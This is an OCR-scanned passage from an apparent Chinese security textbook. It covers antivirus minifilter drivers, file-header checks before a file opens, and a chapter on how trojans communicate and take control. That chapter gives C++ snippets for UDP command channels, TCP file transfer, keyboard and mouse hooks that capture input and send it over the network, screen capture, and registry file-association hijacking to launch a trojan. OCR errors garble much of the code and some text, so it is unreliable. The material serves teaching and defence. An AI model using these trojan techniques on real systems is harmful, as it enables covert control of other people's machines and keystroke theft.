绍 常见 的 一 种 方法 。 本 例 以 MINIFILTER 框架 来 实现 。 
(1) 应 用 程序 中 的 代码 


#include <C:\WinDDK\\7600.16385.1\inc\ddk\FltUser.h> 

#pragma comment(lib, "C:\WinDDK\\7600.16385.1\lib\wxp\i386\fItLib.lib") 
#pragma comment(lib, "C:\WinDDK\\7600.16385.1\lib\wxp\i386\fltMer.lib") 
#pragma comment(lib, "C:\WinDDK\\7600.16385.1\lib\wxp\i386\\ntoskrnl.lib") 
#pragma comment(lib, "C:\\WinDDK\\7600.16385.1\\lib\\wxp\\i386\\hal. lib") 
HANDLE g hPort-0, completion; 

#define NPMINI NAME L"NPninifilter" 

#define NPMINI PORT NAME L'NNPMiniPort" 

/控制 命令 结构 
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typedef struct. COMMAND MESSAGE í 


DWORD Command: 

wchar t Folder[512]: 
) COMMAND MESSAGE, *PCOMMAND MESSAGE: 
/建立 通信 
if(g hPort—0)( 


hResult = FilterConnectCommunicationPort( 
NPMINI PORT NAME, 


NULL, 
&g hPort ): 
) 
/向 驱动 发 送 控制 信息 
DWORD bytesRetumed = 0: 
DWORD hResult = 0: 
COMMAND MESSAGE data: 
memset(&data, 0, sizeof(data)): 
data.Command-1; 
hResult = FilterSendMessage( 
g hPort, 
&data, 
sizeofCOMMAND MESSAGE), 
&data, 
sizeofCOMMAND MESSAGE). 
&bytesReturned ); 
/从 驱动 取 回 返回 信息 指针 
这 data.Command 一 1){ 
PVOID p-*((PVOID*)data.Folder): 


(2) 驱动 中 的 代码 


/定义 控制 命令 结构 

typedef struct. COMMAND MESSAGE ( 
ULONG Command: 
WCHAR Folder[512]: 


) COMMAND MESSAGE, *PCOMMAND_MESSAGE: 
/在 驱动 的 NPMiniMessage 函数 中 接收 应 用 程序 的 命令 
NTSTATUS 
NPMiniMessage ( 
. in PVOID ConnectionCookie, 
. in bcount opt(InputBufferSize) PVOID InputBuffer, 
. in ULONG InputBufferSize, 
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. Out bcount part opt(OutputBufferSize.*ReturnOutputBufferLength) PVOID OutputBuffer, 
. in ULONG OutputBufferSize, 
. out PULONG ReturnOutputBufferLength 
) 
{ 
NPMINI COMMAND command: 
PCOMMAND MESSAGE  pMessage-NULL; 
pMessage = (PCOMMAND MESSAGEJInputBuffer: 
switch (pMessage-»Command) í 
/在 此 得 到 应 用 程序 发 送 过 来 的 命令 


3.64 ”驱动 主动 向 应 用 程序 发 送信 息 


驱动 程序 可 能 需要 将 捕获 的 信息 发 送 给 应 用 程序 ， 由 应 用 程序 来 处 理 ， 比 如 某 进程 生 
成 了 一 个 可 执行 文件 ， 可 能 需要 将 此 信息 返回 给 应 用 程序 。 下 面 的 方法 实现 驱动 主动 向 应 
用 程序 发 送信 息 。 应 用 程序 先 和 驱动 建立 通信 端口 ， 然 后 建立 一 个 线程 负责 接收 来 自 驱 动 
的 信息 。 驱 动 调用 函数 FltSendMessage 向 应 用 程序 发 送信 息 。 


1. 应 用 程序 端 
HANDLE g hPort-0 : 
#define NPMINI NAME L"NPminifilter" 
#define NPMINI PORT NAME L'WNPMiniPort" 
/建立 通信 端口 


hResult = FilterConnectCommunicationPort( 
NPMINI PORT NAME, 
0. 


0. 

NULL. 

&g hPort ): 
) 

if(hResult!=0)return: 

/建立 线程 
void CVC 驱动 测试 Dlg::OnBnClickedButton30 
£ 
WORD threadId: 
CreateThread( NULL.0.LPTHREAD START ROUTINE )MonThread222.this.0. 
&threadld ): 
) 
/线程 函数 中 负责 接收 信息 
DWORD MonThread222(PVOID Context) 
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{ 
CVC 驱动 测试 Dlg *my-(CVC 驱动 测试 Dlg*)Context 
typedef struct { 
FILTER MESSAGE HEADER head: 
DWORD qq: 
DWORD bb; 
wchar t Text[260]: 
}MYSTRUCT: 
MYSTRUCT myS={0}: 
dof 
DWORD len-0: 
memset(myS.Text.0,520): 
ifS OK—FilterGetMessage(g hPort (FILTER MESSAGE HEADER*)(&myS.head), 
sizeof(MYSTRUCT).NULL))( 
my-»listBox.AddString(myS.Text): 
) 
Sleep(100); 
jwhile(1); 
return 0; 


) 
2. 驱动 程序 端 


typedef struct MSG_NOTIFICATION{ 
ULONG StrLength; 
ULONG Reserved; 
WCHAR Contents[260]: 
} MYSTRUCT : 
PFLT PORT gClientPort=NULL; 
MYSTRUCT milnf-(0): 
FLT POSTOP CALLBACK STATUS 
NPPostCreate ( 
. inout PFLT CALLBACK DATA Data, 
. in PCFLT RELATED OBJECTS FltObjects, 
. in opt PVOID CompletionContext, 
. inFLT POST OPERATION FLAGS Flags 
) 


ULONG uReplyLength: 
RtlCopyMemory(milInf Contents.pNew--Path,wcslen(pNew--Path)*2): 
/向 应 用 程序 发 送信 息 
if(gClientPort)FItSendMessage(gFilterHandle.&gClientPort,&milnf sizeofüMY STRUCT).NULL.&u 
ReplyLength. NULL): 
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/如 果 应 用 程序 关闭 ， 要 在 下 面 的 函数 中 释放 通信 端口 ， 否 则 无 法 再 联系 
NTSTATUS 


NPMiniConnect( 
. inPFLT PORT ClientPort, 
. in PVOID ServerPortCookie, 
. in bcount(SizeOfContext) PVOID ConnectionContext, 
. in ULONG SizeOfContext, 
. deref out opt PVOID *ConnectionCookie 
) 


PAGED CODEO: 
gClientPort — ClientPort; 
retum STATUS. SUCCESS; 
) 
VOID 
NPMiniDisconnect( 
. in opt PVOID ConnectionCookie 
) 


€ 
PAGED CODE0: 
FltCloseClientPort( gFilterHandle, &gClientPort ): 
gClientPort-NULL; 

} 


3.6.5 ”文件 打开 或 建立 前 的 检查 


如 果 一 个 程序 打开 了 一 个 文件 ， 或 创建 了 一 个 新 文件 ， 该 文件 是 否 含有 病毒 ， 应 该 进 
行 检查 。 如果 含 有 病毒 , 则 禁止 打开 。 下 面 的 例子 演示 一 个 程序 打开 前 检查 其 是 否 为 Office 
2007 和 Office 2003 文件 格式 、PDF 格式 和 PE 文件 格式 。 步 骤 如 下 : 
(1) 定义 文件 格式 标志 。 
static UCHAR Office2007[16]=(0x50.0x4b.0x03.0x04.0x14.0x00.0x06.0x00.0x08. 
0x00,0x00,0x00,0x21,0x00,0xd2,0xd1}; //OFFICE 2007 格式 
Office2003[16]={0xd0,0xcf.0x11,0xe0,0xa1,0xb1.0x1a,0xe1,0x00,0x00,0x00.0x00, 
0x00.0x00.0x00.0x00}: //OFFICE 2003 格式 
static PUCHAR Pdf="%PDF": /PDF 格式 
static UCHAR Exe[6]={0x4d.0x5a.0x90.0x00.0x03.0x00}: //PE 格式 


Q) 定义 分 析 文件 格式 函数 


/disk 是 盘 符 ，fname 是 文件 名 (不 含 盘 符 ) 
int ReadPreFile(PCFLT RELATED OBJECTS FltObjects.PWCHAR disk. PWCHAR fname) 
t 
HANDLE hFilel=NULL: 
ULONG length1-16: 
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LARGE INTEGER offset1- (0): 
IO STATUS BLOCK Io Status Block1-(0): 
OBJECT ATTRIBUTES obj attribl: 
NTSTATUS status; 
int num-0: 
UCHAR buf[16]-(0): 
WCHAR  from[300]-(0): 
int ret—-1: 
UNICODE STRING filel : 
FILE STANDARD INFORMATION  FileInfo: 
num-wcslen(disk): 
RtlCopyMemory(from.disk.num*2): 
length1—wcslen(fname)*2: 
RtlCopyMemory(&from[num], fname, length1): 
length1-16: 
RtlInitUnicodeString( &file1. from); 
/初始 化 化 生成 的 文件 
TnitializeObjectAttributes(&obj attribl, &filel, 
OBJ KERNEL HANDLE|JOBJ CASE INSENSITIVE, NULL.NULL) : // 
num-0: 
status = FltCreateFile(FltObjects--Filter, 
FltObjects-»Instance, 
&hFilel, 
GENERIC READ, 
&obj attribl, 
&Io Status Blockl, 
NULL. 
FILE ATTRIBUTE NORMAL, 
GENERIC WRITE, 
FILE OPEN, 
FILE NON DIRECTORY FILE| FILE SYNCHRONOUS IO NONALERT, 
NULL, 
0. 
IO IGNORE SHARE ACCESS CHECK 
| 
if(INT SUCCESS(status)goto — end: 
status = ZwQueryInformationFile(hFilel, &Io Status Blockl.&FileInfo.sizeof 
(FILE STANDARD INFORMATION ).FileStandardInformation): 
if(INT SUCCESS(status))goto _ end: 
if(FileInfo.Directory) { 
DbgPrint("ReadFileFlag 放 过 文件 夹 96S" from): 
goto end: } 
if(FileInfo.DeletePending)goto — end: 
if(FileInfo.EndOfFile.QuadPart-16)goto — end: 
//DbgPrint("ReadFileFlag len-?6X, 96S" FileInfo.EndOfFile.QuadPart.from): 
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offset1.QuadPart=0: 
status = ZwReadFile(hFilel.NULL.NULL.NULL.&Io Status Blockl. 
buf£length1.&offsetl NULL): 
if(INT SUCCESS(status))goto — end: 
if(RtICompareMemory(buf Pdf.4)—4) ( 
DbgPrint("ReadFileFlag 发 现 PDF 96S" from): 
155: 
) 
else if(RtlICompareMemory(buf.Office2007.9)—9) ( 
DbgPrint("ReadFileFlag 发 现 Office2007 96S" from): 
ret-0: 
) 
else if(RtICompareMemory(buf.Office2003.9)—9) ( 
ret-0; 
DbgPrint("ReadFileFlag 发 现 Office2003 96S". from): 
) 
else 这 RtlCompareMemory(buf Exe.6) 一 60){ 
DbgPrint("ReadFileFlag 发 现 EXE %X".Data->Iopb->TargetFileObject->FsContext): 
ret-1000; 
) 
. end: 
if(hFilel)ZwClose(hFilel): 
retum ret; 


) 
(3) 在 NPPreCreate 中 调用 分 析 文 件 函数 。 

FLT PREOP CALLBACK STATUS 

NPPreCreate ( 
. inout PFLT CALLBACK DATA Data, 
. inPCFLT RELATED OBJECTS FltObjects, 
. deref out opt PVOID *CompletionContext 
) 


PUNICODE STRING driver. ” // 盘 符 ， 为 DiskVolumel 等 

UNICODE STRING mydriver; // 受 保护 盘 符 

GET NAME CONTROL nameControl; 

PWCHAR ptrl-Data-»Iopb-^TargetFileObject-»FileName.Buffer: 

driver = SfGetFileName(FltObjects-^FileObject.Data--IoStatus.Status, 
&nameControl): // 盘 符 

if(0!=ReadPreFile(FltObjects, driver->Buffer ptr1)) ( 
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3.7 小 结 


本 章 的 重点 是 PE 文件 病毒 的 感染 原理 、 防 止 PE 文件 病毒 感染 的 方法 、 文 件 过 滤 驱 动 
的 框架 、 应 用 程序 和 驱动 程序 的 通信 。 文 件 过 滤 是 反 病毒 最 常用 的 手段 。 


38 习题 


. 实现 移动 PE 文件 头 ， 防 止 病毒 新 建 节 。 
实现 填充 每 个 节 的 空白 部 分 防 病毒 。 

. 实现 使 用 CRC32 校 验 防止 病毒 修改 文件 。 
. 针对 某 种 病毒 ， 设 计 自 己 的 病毒 专 杀 工 具 。 
- 简 述 病毒 是 怎样 找到 被 感染 的 文件 的 ? 
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本 章 介绍 基于 远程 控制 的 木马 知识 ， 主 要 内 容 如 下 : 
° 木马 是 如 何 启 动 的 ; 

° 木马 是 如 何 通 信和 的 ; 

e 木马 是 如 何 控制 的 ; 

e ”如 何 寻 找 与 清除 木马 。 


4.1 关于 木马 的 一 般 知识 


木马 ， 也 称 特 伊 洛 木马 ， 此 词语 来 源 于 古 希 腊 的 神话 故事 。 在 对 以 往 网 络 安全 事件 的 
分 析 统 计 里 ， 有 相当 部 分 的 网 络 入 侵 是 通过 木马 来 实现 的 。 

木马 的 危害 性 在 于 它 对 计算 机 系统 强大 的 控制 和 破坏 能 力 ， 如 窃取 密码 、 控 制 系统 操 
作 、 进 行文 件 操作 等 。 一 个 功能 强大 的 木马 一 旦 被 植 入 一 台 计 算 机， 攻击 者 就 可 以 像 操 作 
自己 的 计算 机 一 样 控制 它 。 典 型 的 木马 有 冰河 、 广 外 女生 等 。 木 马 是 一 种 基于 远程 控制 的 
黑客 工具 ， 其 本 质 上 是 基于 TCP/IP 协议 的 客户 机 /服务 器 应 用 程序 。 

木马 由 两 个 部 分 组 成 : 一 个 是 服务 端 程序 , 运行 于 一 台 机 器 上 ; 另 一 个 是 客户 端 程序 ， 
运行 于 另 一 台 机 器 上 。 客 户 端 程序 通过 网 络 与 另 一 台 机 器 上 的 服务 程序 进行 通信 ， 发 送 命 
令 和 接收 返回 信息 ， 从 而 控制 对 方 机 器 。 服 务 端 程序 在 A 机 端口 上 侦 听 ， 客 户 端 程序 从 B 
机 上 向 A 机 发 出 连接 请 求 ， 并 建立 连接 。 客 户 端 程序 就 可 以 向 服务 端 程序 发 送 命令 ， 通 过 
服务 端 程序 控制 A 机 。 

由 于 防火 增 严 格 限 制 由 外 向 内 的 连接 ， 对 由 内 向 外 的 连接 限制 却 不 严格 ， 也 曾经 出 现 
过 将 客户 端 程序 安装 在 被 侵入 的 A 机 上 ， 服 务 端 程序 安装 在 B 机 上 ，A 机 程序 向 B 机 发 
出 连接 ， 建 立 连接 后 由 服务 程序 控制 安装 有 客户 程序 的 B 机 的 木马 程序 。 


42 ”远程 通信 


远程 通信 最 简单 的 方法 是 使 用 UDP 和 TCP 进行 通信 。 
1. 使 用 UDP 发 送 命令 
比如 ， 控 制 端 向 被 控制 端 发 送 命令 ， 可 以 使 用 UDP 实现 。 
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在 使 用 VC 编程 时 ， 记 得 要 选择 套 接 字 ， 否 则 要 手动 添加 。 使 用 UDP 通信 是 互 为 客户 
端 、 互 为 服务 端 。 发 送信 息 可 以 在 主线 程 ， 接 收 信息 应 该 在 子 线程 中 进行 。 


/一 端的 代码 ， 也 是 另 一 端的 代码 
// 设 接收 的 端口 是 26000， 发 送 的 端口 是 26001 
// 要 注意 的 是 在 VS2008 中 ， 在 线程 中 使 用 套 接 字 ， 要 先 调用 函 SocketThreadInitO 
void SocketThreadInit() 
t 
#ifndef _AFXDLL 
#define _AFX SOCK THREAD STATE AFX MODULE THREAD STATE 
define ^ afxSockThreadState ^ AfxGetModuleThreadState() 
.AFX SOCK THREAD STATE* pState= afxSockThreadState: 
if(pState-"m pmapSocketHandle = NULL) 
pState-»m pmapSocketHandle = new CMapPtrToPtr: 
if(pState-"m pmapDeadSockets = NULL) 
pState-»m pmapDeadSockets = new CMapPuToPtr; 
if(pState->m plistSocketNotifications = NULL) 
pState->m plistSocketNotifications = new CPtrList: 


#endif 
) 
/定义 接收 数据 的 线程 
UINT ThreadProc(LPVOID param) ( 
CUDPServerDlg *my-(CUDPServerDlg*)param: 
SocketThreadlnit(): 
CSocket *m hSocket-new CSocket(): 
m hSocket-»Create(26000, SOCK DGRAM): 
BYTE pdat[512]: 
dof 
CString ip: 
CString inf: 
UINT port: 
memset(pdat.0.512): 
int len=m hSocket->ReceiveFrom(pdat.512.ip.port): 
这 len>0){ 
pdat[len]=0: 
my->m List.AddString((char*)pDat); /显示 出 来 
) 
Sleep(15): 
}while(1): 
delete m hSocket: 
retum 1: 
) 
/调用 子 线程 
AfxBeginThread(&ThreadProc.this.THREAD PRIORITY BELOW NORMAL.0.0): 
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/发 送 数据 

CSocket *m hSocket=new CSocket(): 

m hSocket->Create(26001, SOCK DGRAM); 
char *p-"helo": 

UNIT port-26000: 

CString ip-"192.168.1.100": 

m hSocket-»SendTo(p.strlen(p).port.ip): 


2. 使 用 TCP 传递 文件 


如 果 要 把 一 个 文件 , 比如 图 片 , 从 一 台 计 算 机 传递 到 另 一 台 计 算 机 , 使 用 TCP 很 方便 。 
也 应 该 在 子 线程 中 完成 文件 的 传送 。 由 于 上 面 的 例子 已 经 使 用 了 线程 ， 这 里 直接 使 用 ， 读 
者 可 以 自行 将 其 加 入 到 线程 中 。 


// 服 务 端的 代码 ， 接 收 一 个 文件 
BYTE ch[1024]: 
Imemset(ch.0.1024): 
CSocket s1.s2: 
s1.Create(1800): 
sl.Listen(): 
sl.Accept(s2): 
CFile fp; 
fp.Open("C:Wbbb.rar".CFile::modeCreate|CFile::modeWrite): 
০101 
int len=s2.Receive(ch,1024); 
if(len—SOCKET ERROR || len—O)break: 
fp. Write(ch.len): 
) 
fp.CloseQ: 
s2.Close(): 
sl.Close(): 
/客户 端 代码 ， 发 送 一 个 文件 
CSocket c; 
c.Create(): 
CString m ip = "218.198.34.18"; 
c.Connect(m ip.1800): 
CFile fp: 
fp.Open("E: aaa Wbbb.rar".CFile::modeRead): 
DWORD len-fp.GetLengthO: 
BYTE *ptr-new BYTE[len]: 
fp.Read(ptr.len): 
int n-len/1024: 
inti: 
for(i-0:icn: i)( 
c.Send(ptr-i*1024.1024): 
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if(len?01024)c.Send(ptr-i*1024.1en961024): 
c.Close(: 
if(ptr)delete []ptr: 
fp.CloseQ: 
3. 使 用 共享 文件 夹 直 接 读 写 文件 


建立 共享 文件 夹 的 完整 代码 见 “ 共 享 文件 夹 管 理 ”， 调 用 如 下 函数 表示 将 文件 夹 
“D:Nbeijing” 建 成 任何 人 都 可 以 访问 的 、 密 码 为 “123456”、 共 享 名 为 “beijing” 的 共享 
文件 夹 ， 如 图 4-1 Pros. 


an [A* (ee 共享 | 自 定义 


ET 
rer orti TA RAEN 


网 8 共享 和 安全 ] 

A rare 
回 在 网 络 上 共享 这 个 文件 来 G) 
共享 名 QD: Everyone 


[v] stir PHA RB P WORST ৪) 
了 解 共享 和 安全 的 更 多 信息 。 


4 Hr 防火 雯 配置 为 允许 此 文件 夹 与 网 络 上 其 他 计算 
查看 7১০০5 防火 墙 设置 


Cx )( wa J 
图 4-1 建立 共享 文件 


共享 文件 夹 的 远程 访问 和 读 写 代码 如 下 : 
CreateShareFolder(L"D:\beijing".L"Everyone",L"123456".L"beijing"): 
#include "Winnetwk.h" 
#pragma comment(lib, "mpr.lib") 
DWORD  dwResult; 
NETRESOURCE nr; 
memset(&nr, 0. sizeof(nr)): 
nr.dwScope-RESOURCE CONNECTED: 
nr.dWType-RESOURCETYPE ANY: 
nr.dwDisplayType-RESOURCEDISPLAYTYPE GENERIC: 
nr.dwUsage-RESOURCEUSAGE CONNECTABLE: 
nr.pRemoteName = "192.168. 1.200 beijing": 
//dwResult = WNetAddConnection2(&nr. "123456". "EICClient". 
CONNECT UPDATE PROFILE): 
dwResult = WNetAddConnection2(&nr. NULL. NULL. 
CONNECT UPDATE PROFILE): 
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/对 共享 文件 夹 的 读 写 
CFile fp: 
if(!fp.Open(W919d46867d0c4dc dd aaa. wmv". CFile::modeRead)) ( 
MessageBox("error1"); 
return; 
) 
BYTE *p=new BYTE[1000]: 
memset(p.0.1000): 
fp.Read(p.1000): 
fp.Close(: 
MessageBox((char*)p): 
delete []p: 


43 ”远程 控制 


远程 操作 主要 包括 文件 的 操作 、 屏 幕 的 操作 、 鼠 标 操作 和 键盘 操作 。 文 件 操作 易 实现 ， 
比如 控制 端 发 送 “delete c:\aaa”， 那 么 受 控 端 解析 该 字符 串 ， 可 以 理解 为 删除 一 个 文件 。 
截屏 和 鼠标 键盘 控制 是 本 节 的 主要 内 容 。 


43.4 ”截屏 控制 


如 果 是 控制 端 要 看 受 控 端的 窗口 ， 则 用 UDP 方式 向 受 控 端 发 送 取 窗口 的 命令 。 受 控 
端 截取 窗口 后 存 成 文件 (也 可 以 直接 是 内 存 数 据 )， 还 可 以 进行 压缩 ， 然 后 使 用 TCP 方式 ， 
将 文件 发 给 控制 端 。 控 制 端 收 到 文件 后 , 在 窗口 上 显示 传 过 来 的 图 片 。 主 要 代码 是 取 窗 口 ， 
函数 代码 如 下 : 


void SaveToBmp(HWND h) 

f 

// 截 取 当 前 窗口 的 图 像 ， 存 到 C:\pict 0.bmp 

RECT rect: 

zGetWindowRect(h.&rect): 

CDC dc; 

dc.CreateDC("DISPLAY".NULL.NULL.;NULL): 

CBitmap bm: 

int Width-rect.right-rect.left//GetSystemMetrics/SM CXSCREEN): 
int Height-rect.bottom-rect.top://GetSystemMetrics/SM CYSCREEN): 
bm.CreateCompatibleBitmap(&dc, Width. Height): 

CDC tdc: 

tdc.CreateCompatibleDC(&dc): 
CBitmap*pOld-tdc.SelectObject(&bm): 
tdc.BitBIt(0.0. Width. Height.&dc.rect.left.rect.top.SRCCOPY): 
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tdc.SelectObject(pOld): 

BITMAP btm: 

bm.GetBitmap(&btm): 

DWORD size-btm.bmWidthBytes*btm.bmHeight: 

BYTE* IpData-(BYTE*)GlobalAlloc(GPTR.size): 

UV/ 

BITMAPINFOHEADER bih: 

bih.biBitCount-btm.bmBitsPixel: 

bih.biCIrImportant-0: 

bih.biCIrUsed-0: 

bih.biCompression-0: 

bih.biHeight-btm.bmHeight: 

bih.biPlanes-1: 

bih.biSize-sizeof(BITMAPINFOHEADER): 

bih.biSizeImage-size: 

bih.biWidth-btm.bmWidth: 

bih.biXPelsPerMeter-0; 

bih.bi YPelsPerMeter-0: 

GetDIBits(dc,bm.0.bih.biHeight.IpData.(BITMAPINFO*)&bih.DIB RGB COLORS): 

BITMAPFILEHEADER bfh: 

bfh.bfReserved1-bfh.bfReserved2-0: 

bfh.bfType-0x4d42: 

bfh.bfSize-54-size; 

bfh.bfOffBits-54: 

CString name: 

name-"c:Wpict 0.bmp": 

CFile bf 

if(b£.Open(name.CFile::modeCreate|CFile::modeWrite)) í 
bf Write(&bfh,sizeofR«BITMAPFILEHEADER)): 
bf Write(&bih,sizeof(BITMAPINFOHEADER)): 


bf Write(IpData. size); 
bf.Close(): 

) 

GlobalFree(IpData): 

) 


如 果 觉 得 用 bmp 格式 文件 保存 截图 太 大 ， 可 以 用 CImage 转换 成 16 色 的 jpg。 


#include "atlimage.h" 

CImage im: 

im.Load("c:Wpict 0.bmp"): 
im.Save("c:Wpict_0.jpg".Gdiplus::ImageFormatJPEG): 


4.3.2 ”远程 鼠标 控制 


经 常 可 见 到 这 样 的 软件 ， 控 制 端 鼠标 的 移动 和 单 击 ， 都 可 以 反映 到 受 控 端 。 控 制 端 鼠 
标的 移动 和 按键 动作 ， 一 般 通 过 鼠标 钧 子 获取 。 两 端 需要 定义 一 个 结构 ， 将 鼠标 的 操作 信 
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息 保 存在 结构 中 ， 用 UDP 发 送 到 受 控 端 。 受 控 端 解析 收 到 的 数据 后 ， 通 过 虚拟 鼠标 来 产 
生 虚 拟 鼠 标 信息 。 完 整 程序 见 “ 鼠 标 钩子 捕获 发 送 和 接收 模拟 ”。 
(1) 受 控 端 的 鼠标 钩子 程序 。 
鼠标 钩子 用 于 捕获 鼠标 的 按键 和 位 置信 息 。 定 义 发 送 到 受 控 端 的 数据 结构 如 下 : 
DWORD pos; /鼠标 位 置 ， 高 16 位 是 x， 低 16 位 是 y 
DWORD op: // 16 位 =1， 左 键 ，=2 中 间 键 ，=3 右键 ， 低 16 位 =1， 单 击 ，=2 双击 =3 
移动 >、 控制 端 的 鼠标 钩子 
Sockaddr in RecvAddr:: 
SOCKET SendSocket; 
int Port = 27015; // 接 收 数据 的 端口 
在 安装 钧 子 函数 中 初始 化 ， 代 码 如 下 : 
DLLEXPORT int CALLBACK InstallHOOK(HWND Wnd) 
{ 
if(g hHook—NULL)( 
WSADATA wsaData; 
WSAStartup(MAKEWORDOQ,.2). &wsaData): 
SendSocket = socket(AF INET, SOCK_ DGRAM. IPPROTO UDP): 
RecvAddr.sin family = AF_INET: 
RecvAddr.sin port = htons(Port): 
RecvAddr.sin addr.s addr = inet addr("127.0.0.1"); 
g hHook-SetWindowsHookEx(WH MOUSE.MouseProc.g hlInst,0): 
if(g hHook) retum TRUE: 
) 


return FALSE: 
| 


(2) 鼠标 钩子 拦截 鼠标 信息 ， 发 送 到 控制 端 。 


LRESULT CALLBACK MouseProc( int iCode, 
WPARAM wParam. LPARAM lParam ) 
£ 
if(iCode < 0) 
{ 
retum CallNextHookEx(g_hHook.iCode.wParam.IParam): 
) 
MOUSEHOOKSTRUCT *point=(MOUSEHOOKSTRUCT*)lParam: 
HWND h=WindowFromPoint(point->pt): 
if(wParam—WM MOUSEMOVE||wParam —WM NCMOUSEMOVE) 
op=0x00000003: 
else if(wParam-—WM LBUTTONDOWN) op-0x00010001: 
else 这 wParam 一 WM LBUTTONDBLCLK||wParam —WM NCLBUTTONDBLCLK) 
{ op=0x00010002: ) 
else iftwParam—WM RBUTTONDOWNI|IwParam =-WM_NCRBUTTONDOWN) 
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{ op=0x00020001: 
else if(wParam—WM RBUTTONDBLCLK|wParam —WM NCRBUTTONDBLCLK) 
£ op=0x00020002: ) 
/发 送 到 控制 端 
char dat[8]: 
memcpy(dat.&pos.4): 
memoepy(&dat[4].&op.4): 
sendto(SendSocket.dat,8.0.(SOCKADDR *) &RecvAddr.sizeof(RecvAddr)): 
return CallNextHookEx(g hHook.iCode.wParam.IParam): 
) 


(3) 控制 端 在 子 线程 中 接收 受 控 端 发 来 的 信息 。 


UINT ThreadProc(LPVOID param)( ”// 建 立 子 线程 
C 接收 鼠标 数据 Die *Input=(C 接收 鼠标 数据 Dig*)param: 


} 
// 在 程序 初始 化 函数 中 启动 子 线程 
AfxBeginThread(&ThreadProc.this THREAD PRIORITY BELOW NORMAL.0.0): 
/一 下 代码 接收 对 方 数据 
dof 
recvfrom(RecvSocket, RecvBuf. BufLen. 0. (SOCKADDR *)&SenderAddr. 
&SenderAddrSize): 
DWORD x=*(DWORD*)RecvBuf: 
DWORD y=x>>16; 
X-X&OXFFFF: 
DWORD op-*(DWORD*)(&RecvBuf[4]): 


(4) 受 控 端 产生 虚拟 鼠标 信息 。 
虚拟 鼠标 信息 调用 函数 SendInput。 以 虚拟 鼠标 单 击 为 例 ， 代 码 如 下 : 
else if((op&OxFFFF)—1) ( // 单 击 
这 (op>>16) 一 D){ NEB 
INPUT Input={0}: 
// left down 
Input type = INPUT MOUSE: 
Inputmi.dwFlags = MOUSEEVENTF LEFTDOWN: 
zSendInput(1.&Input.sizeof(INPUT)): 
// left up 
:ZeroMemory(&InputsizeofINPUT)): 
Inputtype= INPUT MOUSE; 
Input.mi.dwFlags = MOUSEEVENTF. LEFTUP: 
zSendInput(1,&Input,sizeof(INPUT)): 
) 


请 注意 ， 鼠 标的 虚拟 有 按 下 和 释放 两 个 过 程 。 
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4.3.3 ”远程 键盘 控制 


远程 键盘 控制 和 远程 鼠标 控制 类 似 。 控 制 端 通过 键盘 钩子 捕捉 键 盘 按键 信息 ， 然 后 通 
过 UDP 发 送 到 受 控 端 。 受 控 端 解析 接收 到 的 信息 ， 然 后 产生 虚拟 键盘 信息 。 详 细 程序 见 
“键盘 钩子 和 远程 复 现 ”。 
0) 控制 端 键盘 钩子 捕获 键盘 信息 并 发 送 。 
LRESULT CALLBACK KeyboardProc( 
int iCode, WPARAM wParam, LPARAM IParam) 
{ 
if(iCode < O)return CallNextHookEx(g hHook.iCode.wParam.IParam): 
这 IParam&0x40000000){ /R Eik F 
if isascii((char)wParam)) {// REF 
if((wParam>='A' && wParam<='Z')|| (wParam>='a' && wParam-—'z)) 
这 (!(GetKeyState(VK_ CAPITAL) && OxFF))&&((GetKeyState(VK LSHIFT) && OxFF) 
|KGetKeyState(VK. RSHIFT) && OxFF))) ( 
/大 写 
) 
else if(((GetKeyStat(VK CAPITAL) && OxFF))&&((GetKeyStat(VK LSHIFT) && OxFF) 
|KGetKeyState(VK RSHIFT) && OxFF))) í 
wParam+=0x20; /小 写 
else 这 (!(GetKeyState(VK_ CAPITAL) && OxFF))&&(!(GetKeyState(VK LSHIFT) && OxFF) 
&&(IGetKeyState(VK RSHIFT) && OxFF))) { 
wParam+=0x20; /小 写 
} 
/发 送 到 受 控 端 
char dat[8]: 
memcpy(dat.&wParam.4); 
memcpy(&dat[4].&lParam.4): 
sendto(SendSocket.dat,8.0.(SOCKADDR *) &RecvAddr.sizeof(RecvAddr)): 
n 
retum CallNextHookEx(g hHook.iCode,wParam.IParam): 
) 


(2) 受 控 端 在 子 线程 中 接收 数据 并 产生 虚拟 键盘 信息 。 虚 拟 键盘 信息 也 是 调用 函数 
SendInput. 


dot 
Tecvfrom(RecvSocket. 
RecvBuf. 
BufLen. 
0. 
(SOCKADDR *)&SenderAddr. 
&SenderAddrSize): 
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DWORD vKey=*(DWORD*)RecvBuf: /虚拟 码 
DWORD op=*(DWORD*)(&RecvBuf4]): 
BYTE scanCode=(BYTE)(op>>16):// 扫 描 码 
WORD times=(WORD)op: /重复 次 数 
这 _ isasci((charyvKey)) ( 
/虚拟 键盘 信息 

INPUT inp[2]: 
inp[0] type = INPUT KEYBOARD: 
inp[0].ki.dwExtraInfo = ::GetMessageExtralInfo(): 
inp[0] ki.dwFlags = 0: 
inp[0] ki time = 0: 
inp[0].ki.wScan = scanCode: 
inp[0].ki.wVk = vKey: 
inp[1].ki.dwFlags = KEYEVENTF KEYUP: 
SendInput(. inp, sizeof(INPUT)): 
) 

Jwhile(1); 


434 文件 关联 与 程序 启动 


所 谓 “文件 关联 ”就 是 将 某 种 扩展 名 的 文件 和 某 个 可 执行 文件 联系 起 来 ， 双 击 该 文件 
后 系统 就 会 调用 那个 可 执行 文件 打开 它 , 例如 双击 扩展 名 为 .txt 文件 后 , 记事 本 notepad exe 
就 会 启动 并 打开 该 文本 文件 。 木 马 通过 修改 注册 表 ， 例 如 若 让 扩展 名 为 .txt 的 文件 和 木马 
程序 关联 ， 那 么 双击 *.txt 文件 后 木马 程序 会 启动 。 

因为 经 常 需要 写 文件 关联 程序 ， 这 里 先 不 去 理会 木马 的 方式 ， 而 来 关注 一 下 文件 的 关 
联 。 文 件 关联 的 记录 是 在 注册 表 ， 例 如 记事 本 和 *.txt 的 关联 ， 在 注册 表 如 图 4-2 所 示 的 位 
置 可 以 找到 。 


"T 
注册 表 OD 
BD txtfile a 
@ DefaultIcon 
EH shell 
@ gai eti ths 
E Gl open 


d 原来 为 c:\windows\notepad. exe %1| 

B Gl print 
\HKEY_CLASSES_ROOT\ txt £ile\shell\open\ command 
图 4-2 .tt 关联 注册 表 位 置 


数据 
[ab] (BU) “ad: \nypro\relate\debug\relate. EXE %1” 


下 面 的 代码 同时 实现 一 种 文件 和 图 标 ， 还 有 可 执行 文件 的 关联 。 
void CRegeditDlg::OnButton() 
{ 
char MAX. PATH]: 
GetModuleFileName(NULL.a.MAX PATH):// 获 取 自 身 路 径 
char *exp: /exp 是 扩展 名 
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char *exefile; /exe 是 被 绑 定 的 可 执行 文件 全 路 径 

